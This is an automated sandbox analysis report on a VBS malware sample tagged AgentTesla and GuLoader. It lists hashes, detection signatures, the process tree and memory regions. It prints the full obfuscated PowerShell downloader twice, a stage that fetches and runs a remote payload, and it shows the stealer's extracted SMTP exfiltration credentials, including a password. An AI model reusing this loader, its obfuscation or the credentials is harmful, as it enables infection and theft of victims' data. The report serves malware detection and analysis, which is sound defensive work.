Overview

overview

10

Static

static

1

0b8154e390...ad.vbs

windows7-x64

10

0b8154e390...ad.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    181s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-03-2024 02:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0b8154e3905fe82a62732791895e0510c240067b97f5ddf4edee2b10f2e984ad.vbs

  • Size

    37KB

  • MD5

    80c96ad14b599fbc36f688a6dbc2efb8

  • SHA1

    031ceb90f111733e78a69f883d0d8465db7712d1

  • SHA256

    0b8154e3905fe82a62732791895e0510c240067b97f5ddf4edee2b10f2e984ad

  • SHA512

    47d1b5a2046a7729717f22c0b2dfda92bbea8360570df3d19c2882955a0ec312d2aa46cc6d2ef6620979bf97d1ce67484870c77994fd835007f273cbcc4cb5a5

  • SSDEEP

    768:u00gBRvWAZGc8NnKwiQm96aPESr2bBiort:X1qNnKwfZSibBi6

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.ispartamensucat.com.tr
  • Port:
    587
  • Username:
    impex@ispartamensucat.com.tr
  • Password:
    Qaz!'2020,

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.ispartamensucat.com.tr
  • Port:
    587
  • Username:
    impex@ispartamensucat.com.tr
  • Password:
    Qaz!'2020,
  • Email To:
    nonewthing9@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b8154e3905fe82a62732791895e0510c240067b97f5ddf4edee2b10f2e984ad.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Begoniers Maytime Treacheries Enrichments #>;$Ompostering=(cmd /c set /A 115^^0);Function Refurnishment ([String]$Rodknolde){$Haori=[char][int]$Ompostering+'ubstring';$Lavements133=8;$Skibsrotten=Alpehuers($Rodknolde);For($Suddenty=7; $Suddenty -lt $Skibsrotten; $Suddenty+=$Lavements133){$Reaccedes=$Rodknolde.$Haori.Invoke($Suddenty, 1);$Finfish=$Finfish+$Reaccedes;}$Finfish;}function Nationalhistoriske ($Indflytning){. ($Cephaloplegia) ($Indflytning);}function Alpehuers ([String]$Firklver){$Whiney=$Firklver.Length-1;$Whiney;}$Phaseout=Refurnishment 'VrelsesTDatamatrAyreguaaVa,egldnVanddybsMervrdifRealiteeNon.ictr Inter rUnweariiR.mergenBraserogJemadar ';$wapper=Refurnishment 'BarberehFolketit T,ereat,nderwapJustervsInkasso:Taabern/ Ca rie/Pol.tekdA korterMalena,i HymnolvCommunieBor fyl.Dublhheg,ffectaoUndr wso Zoomengjordfyll Ggeb,kePapil,o.Lep,osecHomol,soNonfortmSymmetr/bibliotuD,namitcLiestst? UnconseMuriel,xVicarespMultifuo GillarrAfmytoltGas.fyb=AtomenedSomesthoRhizocawGalehusnDichlonlimbricaoDyksvmmacraniogdNonpost&StreuseiDiplomad Si.nal=Fortovs1ReussermTredveagA,moinaHSkriftvePubli,aR Polj ijSkj lesc Ugen,sxSek aartBldagtiG etrameBBasisf,YEmissiojFarrier6UnliddeJS.prasqq Conden4MenneskwFi.kerfr Klinisi Cr,mblz PseudoMPontifiJunderprmBirdb.rL PostcoL isoporJPedanteMBeste mjLyrikerfMate,iaJ Idrts RB vidne ';$Cephaloplegia=Refurnishment ' audi,fiNyligste Deser,xAp,gogu ';$Glyptotherium=Refurnishment 'Tr vest$Elastikg,olitzelKarde.ooTooshkubNurledlaGr cioulKat lee:StyrtniALydsv.gnEftergrg S,lvsae SbemadlTruthsssCuttiesh Neut,ai usindkpU antic sidi l=Avalanc DommernSMugningt TilskuaLutringr LedetetUnde,pl-FstningBMonzogaiWrabbe t ,sensfs BaglygT,dpnsesrZonoskeaSengestnCardinesNothosafQuatre,eGruppesrLaminer Pa,ipha- FormumS Needleostammodu S nikerF.lkemocKorrigeeSaerret Thralli$RevaporwForskeraAltingspNonabrapCascrome N.vaidr Oxamet Beregni-skole,oDRaamlkbeGr tinosUtillitt ForaeriDippenenStrummeaTito sttRamosopiLeucadioDumoustnSpytten Gennemr$StudineKredrewfoBelysnin,obberysdaphn,at G,anulaBeknowcnagriotycLitt.rae Gradma ';Nationalhistoriske (Refurnishment 'Sabbats$Umenne.gFinebenlRefusiooMenneskbUnsu,plaOrdspillWombsid:Outwr,tKsammenho HenslbnBeraabesToboggatDaubersaWestralnnervesacBrisleneCheckbl=Overtap$SacrameeInoxidinFlourisv Brutto:Kvin,esa OmkamppTricksyp NiggledSmuttilaGleeksitInddataaD,bbers ') ;Nationalhistoriske (Refurnishment 'Holo.edIunderekmprolu.ip Ad.uceoHyperserOmgn eltgob.ine-bastardMByggesko TaurandSecunduuDeltid.lUnder eeBroklap RockendBAbonneriUnde.sltRadialgsPro mbiTGaliotrr Tainosa.eutraln MastigsNonarmaf.utostreAlitaserCoar,en ') ;$Konstance=$Konstance+'\Antenneforenings.Spr' ;Nationalhistoriske (Refurnishment 'Libidin$K,otomigScaurdilSenonesoCsurersb.oggleraMoere.pl Long i: ops,rvFStemmeuo YengeetT,uculeoSupe arnBarberi9 Pred.c6 Bilaeg=Fo,styr(F,rflgeTKryoliteAr ejdssCasuisttMarm,rf-Lynf.ysPFinlanda PensiotSrtrykkhSurgica Tillokk$AnkerflKPostpyloBu,tenlnDrmsblesUntria,tSmukkesa serpennBedumbecPropmisePampean)B undsh ') ;while (-not $Foton96) {Nationalhistoriske (Refurnishment ' aktiv IOpgravef Kapell Sengest( Icenil$ .ixdalAausfo mnNondiscgSidekameO,erthrlAfpluknsDrawb chRakk,sbiKu susvpFluersh.ParagloJ XerophoTilgif.bGendarmSSterrittDisconsaForlbsmtStreamle Lkkest Geophi-SubcorpeT,odoliqpilhenv Misdem$DedimusPDiscounhTheshirasp.rtspsPrelocaeHypercro TavensuRais nstGi soni)In lgni Juleme{afgrsseSHo,edpitTetracoaStenostr iscenetFala gi-ol,veneS Natio,lTiaraere SemicoeM.rsomhpPeriton Infiltr1Landage} Mega,oeYodlinglOver.atsCompan,eVogt rn{ForekomSNeurol.tKnalleraPatru jrManhuntt Af lre-OboerneS CabbaglFjerkrseThitsioeBlackisp S.ecta lystren1Geonyct;NormeriNBra oraaDecoctstPromachiSvejfnioKu.serenudlngseaBadmou.lForstenhSe eraliBgersvisBespurrtIn ermuoCapillirStollesi Laco isCarabi kOrato.ie Udtrri Fjordmu$DistrakG .ingoclReali.my Py nodpEuphe itBjergisoElvtedetHous leh IndtryeAnginaerFilv ktiRetsprauAbb ysfm Rundki} Sprkno ');Nationalhistoriske (Refurnishment 'Ra hael$Dy lgergTidl.sflMos,ndeoAlpin,sbLicensna Udveksl Skatki:DemobilFRetrimmoSkydesttHeavyweoPr gteknInctrip9 Seksua6mathema= Pendnb(HoodmenT DyblereDid.ctisHovedlitSte,mek- TruantP Samothalaartunt Caristh O,frel Nongrav$ ExaggeKT,ansluoChimerinDrikkels AcetoptForamina Neddykn Duksedc,illadse Dermat)Cu.dles ') ;}Nationalhistoriske (Refurnishment 'omklam.$necessig Balfalltilbereopipie.tbFrihedsaResta,rl upern:NonsynoNPusteruoSpndskrn AstrinaT,osbekc NyttigcProtamioSpaltniranabolidRetireraGeldespnStruktutDottlef1Louter,4 Afk yd5 Brands mes eri=Voldove SmalsavGSyntakseImdegaat German- ShrikeCAgallocohumfeypnreborestModesteehemocytnHu.dyrhtFluorid Winter$OverwovK.emitteoL.thworn,lubbeds substitBur,etbaoriginan consulc Te.tereHjert,d ');Nationalhistoriske (Refurnishment 'Rel.van$ ntikvag obumbrlYardstioRokkehjbSyndfloaScrimmal teamti:.ndermuTegensinrUnibankaAfplingnSpecifisCour.rolUmpiresiWhi,pabtAffretsePrsteskrSmmerumaPreexc.tKathl.eeRoeverhdS,resse Tegneb=Overtrk Fortsat[UdlicitS unmisuySpisepasBeogradtRan.ankeResplitm Bondek.Sktte,eC,ammentoLiver,enTrapezkvnescieneNeurop rMaxifratga,felv] Pr.rem:Skraver:FinskbrFHenlaaorFriskino DesignmAfvnninB Vac,ina UdtagesIndrulleS.andel6Mastigu4ForkbanSLandbrutTet aplrLukkelsiCamw.odnClydelig Di,adv(Udsprge$SuperacN bo tiqoCaulicunMayacaca hand,kcEucharic Ysett,oMyosalprCeyloned elstniaHaltingnUmbrat.t Klient1Fredeli4Bucenta5 ,ndrid) Ikraft ');Nationalhistoriske (Refurnishment 'Karakte$CarpoolgSolarielElye teoso akagb.xilabla Eft,rrlOntario:.etrievSBi licitT fileuu DecurspOpody uiSengestdAwaldthiRoskildtsu kerayLuggin Dihelym= Opdate In ivid[Daar kaSAd.unkty UpwellsBatstert Overf.eAfkldesm Forkla. Zinfa.TOptagereB.egnerxIndholdtharmoni.SofarkkE dernen MadzoocGemmeleoLaminlidlossfuliLaconicnDebonergMelicex]Dog.ysk: unabso:Deti.keA UnderkSSardoniCCoinsurI S,ismaIDesexu .PrimaveGHoejr sedurnl,vtBundgarSOlympiat Cho,airIlandstiEscapeenCor phegDanseor(Platano$ WhiplaT ErhverrSco.finaHel ngsnBengtessgstfriel StongsiKursistt BekisseSkrmvgsrForlagsaKnystettFraterneCavortgdAirwort) Plowgr ');Nationalhistoriske (Refurnishment 'M derfu$Gr,vckrgUnrealil va dsko Se.torbSociabiaGerdsbrltrehjul:Revi,alULssekranVenainvaOxy hthfElyt.umiKredittr pilgrieAntagon= Pana.i$UntangeSBala,cetAfho peuKursus.pUniversi Inf,rrd Frelsei KulturtSpygatsyHairlet. Unrides Saddelu Sta nubThouedfs heathtCambodjrMasqueriReparatn Fennicgudeladt(Cephalo3Municme4Fairp.r5Sisterm5infru,t0fritter0 Udskam,Ensheat3Fone ra1Iconocl8Fodende3 Witlin9Raa.ssa) emporo ');Nationalhistoriske $Unafire;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2464
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Begoniers Maytime Treacheries Enrichments #>;$Ompostering=(cmd /c set /A 115^^0);Function Refurnishment ([String]$Rodknolde){$Haori=[char][int]$Ompostering+'ubstring';$Lavements133=8;$Skibsrotten=Alpehuers($Rodknolde);For($Suddenty=7; $Suddenty -lt $Skibsrotten; $Suddenty+=$Lavements133){$Reaccedes=$Rodknolde.$Haori.Invoke($Suddenty, 1);$Finfish=$Finfish+$Reaccedes;}$Finfish;}function Nationalhistoriske ($Indflytning){. ($Cephaloplegia) ($Indflytning);}function Alpehuers ([String]$Firklver){$Whiney=$Firklver.Length-1;$Whiney;}$Phaseout=Refurnishment 'VrelsesTDatamatrAyreguaaVa,egldnVanddybsMervrdifRealiteeNon.ictr Inter rUnweariiR.mergenBraserogJemadar ';$wapper=Refurnishment 'BarberehFolketit T,ereat,nderwapJustervsInkasso:Taabern/ Ca rie/Pol.tekdA korterMalena,i HymnolvCommunieBor fyl.Dublhheg,ffectaoUndr wso Zoomengjordfyll Ggeb,kePapil,o.Lep,osecHomol,soNonfortmSymmetr/bibliotuD,namitcLiestst? UnconseMuriel,xVicarespMultifuo GillarrAfmytoltGas.fyb=AtomenedSomesthoRhizocawGalehusnDichlonlimbricaoDyksvmmacraniogdNonpost&StreuseiDiplomad Si.nal=Fortovs1ReussermTredveagA,moinaHSkriftvePubli,aR Polj ijSkj lesc Ugen,sxSek aartBldagtiG etrameBBasisf,YEmissiojFarrier6UnliddeJS.prasqq Conden4MenneskwFi.kerfr Klinisi Cr,mblz PseudoMPontifiJunderprmBirdb.rL PostcoL isoporJPedanteMBeste mjLyrikerfMate,iaJ Idrts RB vidne ';$Cephaloplegia=Refurnishment ' audi,fiNyligste Deser,xAp,gogu ';$Glyptotherium=Refurnishment 'Tr vest$Elastikg,olitzelKarde.ooTooshkubNurledlaGr cioulKat lee:StyrtniALydsv.gnEftergrg S,lvsae SbemadlTruthsssCuttiesh Neut,ai usindkpU antic sidi l=Avalanc DommernSMugningt TilskuaLutringr LedetetUnde,pl-FstningBMonzogaiWrabbe t ,sensfs BaglygT,dpnsesrZonoskeaSengestnCardinesNothosafQuatre,eGruppesrLaminer Pa,ipha- FormumS Needleostammodu S nikerF.lkemocKorrigeeSaerret Thralli$RevaporwForskeraAltingspNonabrapCascrome N.vaidr Oxamet Beregni-skole,oDRaamlkbeGr tinosUtillitt ForaeriDippenenStrummeaTito sttRamosopiLeucadioDumoustnSpytten Gennemr$StudineKredrewfoBelysnin,obberysdaphn,at G,anulaBeknowcnagriotycLitt.rae Gradma ';Nationalhistoriske (Refurnishment 'Sabbats$Umenne.gFinebenlRefusiooMenneskbUnsu,plaOrdspillWombsid:Outwr,tKsammenho HenslbnBeraabesToboggatDaubersaWestralnnervesacBrisleneCheckbl=Overtap$SacrameeInoxidinFlourisv Brutto:Kvin,esa OmkamppTricksyp NiggledSmuttilaGleeksitInddataaD,bbers ') ;Nationalhistoriske (Refurnishment 'Holo.edIunderekmprolu.ip Ad.uceoHyperserOmgn eltgob.ine-bastardMByggesko TaurandSecunduuDeltid.lUnder eeBroklap RockendBAbonneriUnde.sltRadialgsPro mbiTGaliotrr Tainosa.eutraln MastigsNonarmaf.utostreAlitaserCoar,en ') ;$Konstance=$Konstance+'\Antenneforenings.Spr' ;Nationalhistoriske (Refurnishment 'Libidin$K,otomigScaurdilSenonesoCsurersb.oggleraMoere.pl Long i: ops,rvFStemmeuo YengeetT,uculeoSupe arnBarberi9 Pred.c6 Bilaeg=Fo,styr(F,rflgeTKryoliteAr ejdssCasuisttMarm,rf-Lynf.ysPFinlanda PensiotSrtrykkhSurgica Tillokk$AnkerflKPostpyloBu,tenlnDrmsblesUntria,tSmukkesa serpennBedumbecPropmisePampean)B undsh ') ;while (-not $Foton96) {Nationalhistoriske (Refurnishment ' aktiv IOpgravef Kapell Sengest( Icenil$ .ixdalAausfo mnNondiscgSidekameO,erthrlAfpluknsDrawb chRakk,sbiKu susvpFluersh.ParagloJ XerophoTilgif.bGendarmSSterrittDisconsaForlbsmtStreamle Lkkest Geophi-SubcorpeT,odoliqpilhenv Misdem$DedimusPDiscounhTheshirasp.rtspsPrelocaeHypercro TavensuRais nstGi soni)In lgni Juleme{afgrsseSHo,edpitTetracoaStenostr iscenetFala gi-ol,veneS Natio,lTiaraere SemicoeM.rsomhpPeriton Infiltr1Landage} Mega,oeYodlinglOver.atsCompan,eVogt rn{ForekomSNeurol.tKnalleraPatru jrManhuntt Af lre-OboerneS CabbaglFjerkrseThitsioeBlackisp S.ecta lystren1Geonyct;NormeriNBra oraaDecoctstPromachiSvejfnioKu.serenudlngseaBadmou.lForstenhSe eraliBgersvisBespurrtIn ermuoCapillirStollesi Laco isCarabi kOrato.ie Udtrri Fjordmu$DistrakG .ingoclReali.my Py nodpEuphe itBjergisoElvtedetHous leh IndtryeAnginaerFilv ktiRetsprauAbb ysfm Rundki} Sprkno ');Nationalhistoriske (Refurnishment 'Ra hael$Dy lgergTidl.sflMos,ndeoAlpin,sbLicensna Udveksl Skatki:DemobilFRetrimmoSkydesttHeavyweoPr gteknInctrip9 Seksua6mathema= Pendnb(HoodmenT DyblereDid.ctisHovedlitSte,mek- TruantP Samothalaartunt Caristh O,frel Nongrav$ ExaggeKT,ansluoChimerinDrikkels AcetoptForamina Neddykn Duksedc,illadse Dermat)Cu.dles ') ;}Nationalhistoriske (Refurnishment 'omklam.$necessig Balfalltilbereopipie.tbFrihedsaResta,rl upern:NonsynoNPusteruoSpndskrn AstrinaT,osbekc NyttigcProtamioSpaltniranabolidRetireraGeldespnStruktutDottlef1Louter,4 Afk yd5 Brands mes eri=Voldove SmalsavGSyntakseImdegaat German- ShrikeCAgallocohumfeypnreborestModesteehemocytnHu.dyrhtFluorid Winter$OverwovK.emitteoL.thworn,lubbeds substitBur,etbaoriginan consulc Te.tereHjert,d ');Nationalhistoriske (Refurnishment 'Rel.van$ ntikvag obumbrlYardstioRokkehjbSyndfloaScrimmal teamti:.ndermuTegensinrUnibankaAfplingnSpecifisCour.rolUmpiresiWhi,pabtAffretsePrsteskrSmmerumaPreexc.tKathl.eeRoeverhdS,resse Tegneb=Overtrk Fortsat[UdlicitS unmisuySpisepasBeogradtRan.ankeResplitm Bondek.Sktte,eC,ammentoLiver,enTrapezkvnescieneNeurop rMaxifratga,felv] Pr.rem:Skraver:FinskbrFHenlaaorFriskino DesignmAfvnninB Vac,ina UdtagesIndrulleS.andel6Mastigu4ForkbanSLandbrutTet aplrLukkelsiCamw.odnClydelig Di,adv(Udsprge$SuperacN bo tiqoCaulicunMayacaca hand,kcEucharic Ysett,oMyosalprCeyloned elstniaHaltingnUmbrat.t Klient1Fredeli4Bucenta5 ,ndrid) Ikraft ');Nationalhistoriske (Refurnishment 'Karakte$CarpoolgSolarielElye teoso akagb.xilabla Eft,rrlOntario:.etrievSBi licitT fileuu DecurspOpody uiSengestdAwaldthiRoskildtsu kerayLuggin Dihelym= Opdate In ivid[Daar kaSAd.unkty UpwellsBatstert Overf.eAfkldesm Forkla. Zinfa.TOptagereB.egnerxIndholdtharmoni.SofarkkE dernen MadzoocGemmeleoLaminlidlossfuliLaconicnDebonergMelicex]Dog.ysk: unabso:Deti.keA UnderkSSardoniCCoinsurI S,ismaIDesexu .PrimaveGHoejr sedurnl,vtBundgarSOlympiat Cho,airIlandstiEscapeenCor phegDanseor(Platano$ WhiplaT ErhverrSco.finaHel ngsnBengtessgstfriel StongsiKursistt BekisseSkrmvgsrForlagsaKnystettFraterneCavortgdAirwort) Plowgr ');Nationalhistoriske (Refurnishment 'M derfu$Gr,vckrgUnrealil va dsko Se.torbSociabiaGerdsbrltrehjul:Revi,alULssekranVenainvaOxy hthfElyt.umiKredittr pilgrieAntagon= Pana.i$UntangeSBala,cetAfho peuKursus.pUniversi Inf,rrd Frelsei KulturtSpygatsyHairlet. Unrides Saddelu Sta nubThouedfs heathtCambodjrMasqueriReparatn Fennicgudeladt(Cephalo3Municme4Fairp.r5Sisterm5infru,t0fritter0 Udskam,Ensheat3Fone ra1Iconocl8Fodende3 Witlin9Raa.ssa) emporo ');Nationalhistoriske $Unafire;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:1668
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2068

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        4e3068e56335935325488de8da1ed0c7

        SHA1

        cd2cfee4278a3161f81dd8fd6056c307d9d7ac9c

        SHA256

        405fc0b838236e4c0463cb949adb0e871e6c2441fe785a3107a73f1a39f1e5bc

        SHA512

        fb6695c578ce597146be2ce022f79be110369d301871c49f45f3b90dc2c1458b5183e4f28812e91faed8b2e4f2317e4051ef4263b0a3ea0b0116de7ecf40e617

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Cab7687.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1YZSSVGN3ABHNE7IUPN6.temp
        Filesize

        7KB

        MD5

        d9243df1a34c60db460c7bb52a9c01d9

        SHA1

        0dca3522738d3c58ee24c9a5ac64df63773c168f

        SHA256

        3e1cab82de36f855e020c2894adb5860f79d0f8fde8dcf28399b38b51247cdd8

        SHA512

        b310232742933d5a9c690d5bf18bc42eac237e29371de518e076aec8afa5a7b270bfaace7115412690f0b152339630b52d64faeb11318697f6b849ec35a94c89

        Download Submit
      • memory/1664-42-0x0000000002740000-0x0000000002780000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1664-40-0x0000000005110000-0x0000000005111000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1664-49-0x00000000065D0000-0x0000000006F77000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/1664-47-0x0000000077D20000-0x0000000077DF6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1664-46-0x0000000006190000-0x0000000006290000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/1664-44-0x0000000077B30000-0x0000000077CD9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/1664-43-0x00000000065D0000-0x0000000006F77000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/1664-36-0x0000000073B80000-0x000000007412B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/1664-41-0x00000000065D0000-0x0000000006F77000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/1664-78-0x00000000065D0000-0x0000000006F77000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/1664-39-0x0000000073B80000-0x000000007412B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/1664-38-0x0000000006190000-0x0000000006290000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/1664-37-0x0000000002740000-0x0000000002780000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1664-77-0x0000000073B80000-0x000000007412B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/1664-23-0x0000000073B80000-0x000000007412B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/1664-24-0x0000000073B80000-0x000000007412B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/1664-25-0x0000000002740000-0x0000000002780000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1664-26-0x0000000002740000-0x0000000002780000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2068-52-0x0000000077D20000-0x0000000077DF6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2068-50-0x0000000077B30000-0x0000000077CD9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2068-88-0x00000000201B0000-0x00000000201F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2068-86-0x000000006F570000-0x000000006FC5E000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2068-83-0x00000000201B0000-0x00000000201F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2068-82-0x0000000001900000-0x00000000022A7000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/2068-81-0x0000000000890000-0x00000000008D2000-memory.dmp
        Filesize

        264KB

        Download
      • memory/2068-80-0x000000006F570000-0x000000006FC5E000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2068-76-0x0000000000890000-0x00000000018F2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2068-53-0x0000000000890000-0x00000000018F2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2068-51-0x0000000077D56000-0x0000000077D57000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2068-48-0x0000000001900000-0x00000000022A7000-memory.dmp
        Filesize

        9.7MB

        Download
      • memory/2628-4-0x000000001B360000-0x000000001B642000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2628-5-0x0000000001E20000-0x0000000001E28000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2628-10-0x000007FEF5F20000-0x000007FEF68BD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2628-19-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-11-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-8-0x0000000002540000-0x0000000002552000-memory.dmp
        Filesize

        72KB

        Download
      • memory/2628-9-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-12-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-6-0x0000000002930000-0x0000000002952000-memory.dmp
        Filesize

        136KB

        Download
      • memory/2628-7-0x000007FEF5F20000-0x000007FEF68BD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2628-79-0x000007FEF5F20000-0x000007FEF68BD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2628-13-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-14-0x000007FEF5F20000-0x000007FEF68BD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2628-15-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-17-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-18-0x0000000002960000-0x00000000029E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2628-16-0x000007FEF5F20000-0x000007FEF68BD000-memory.dmp
        Filesize

        9.6MB

        Download